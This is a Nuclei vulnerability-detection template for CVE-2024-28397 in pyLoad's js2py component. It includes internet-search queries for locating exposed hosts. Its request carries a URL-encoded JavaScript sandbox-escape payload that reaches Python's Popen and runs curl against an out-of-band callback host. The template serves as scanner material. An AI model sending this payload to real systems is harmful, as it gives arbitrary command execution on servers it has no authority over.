54 lines
2.8 KiB
YAML
54 lines
2.8 KiB
YAML
id: CVE-2024-28397
|
|
|
|
info:
|
|
name: pyload-ng js2py - Remote Code Execution
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: medium
|
|
description: |
|
|
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-r9pp-r4xf-597r
|
|
- https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2024-28397
|
|
cwe-id: CWE-94
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09572
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: pyload
|
|
product: pyload
|
|
shodan-query: http.html:"pyload"
|
|
fofa-query: body="pyload"
|
|
google-query: intitle:"pyload"
|
|
zoomeye-query: app:"pyload"
|
|
tags: cve,cve2024,pyload,js2py,rce,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |-
|
|
POST /flash/addcrypted2 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
package=pkg&crypted=MTIzNA%3D%3D&jk=%0A//%20%5B%2B%5D%20command%20goes%20here%3A%0Alet%20cmd%20%3D%20%22curl%20http%3A//{{interactsh-url}}%22%0Alet%20hacked%2C%20bymarve%2C%20n11%0Alet%20getattr%2C%20obj%0A%0Ahacked%20%3D%20Object.getOwnPropertyNames%28%7B%7D%29%0Abymarve%20%3D%20hacked.__getattribute__%0An11%20%3D%20bymarve%28%22__getattribute__%22%29%0Aobj%20%3D%20n11%28%22__class__%22%29.__base__%0Agetattr%20%3D%20obj.__getattribute__%0A%0Afunction%20findpopen%28o%29%20%7B%0A%20%20%20%20let%20result%3B%0A%20%20%20%20for%28let%20i%20in%20o.__subclasses__%28%29%29%20%7B%0A%20%20%20%20%20%20%20%20let%20item%20%3D%20o.__subclasses__%28%29%5Bi%5D%0A%20%20%20%20%20%20%20%20if%28item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20item%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%28item.__name__%20%21%3D%20%22type%22%20%26%26%20%28result%20%3D%20findpopen%28item%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20result%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D%0A%0An11%20%3D%20findpopen%28obj%29%28cmd%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true%29.communicate%28%29%0Aconsole.log%28n11%29%0Afunction%20f%28%29%20%7B%0A%20%20%20%20return%20n11%0A%7D%0A%0A
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- Could not decrypt key
|
|
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
# digest: 4a0a004730450220714710324cd3735b9c5c3886c86dfea521a269a5ed74a7d86d1bd4180e2aadb302210098c29d535eb164767e75dffc74ee7efb0b925be9a91daef0097582cef20f8829:922c64590222798bb761d5b6d8e72950 |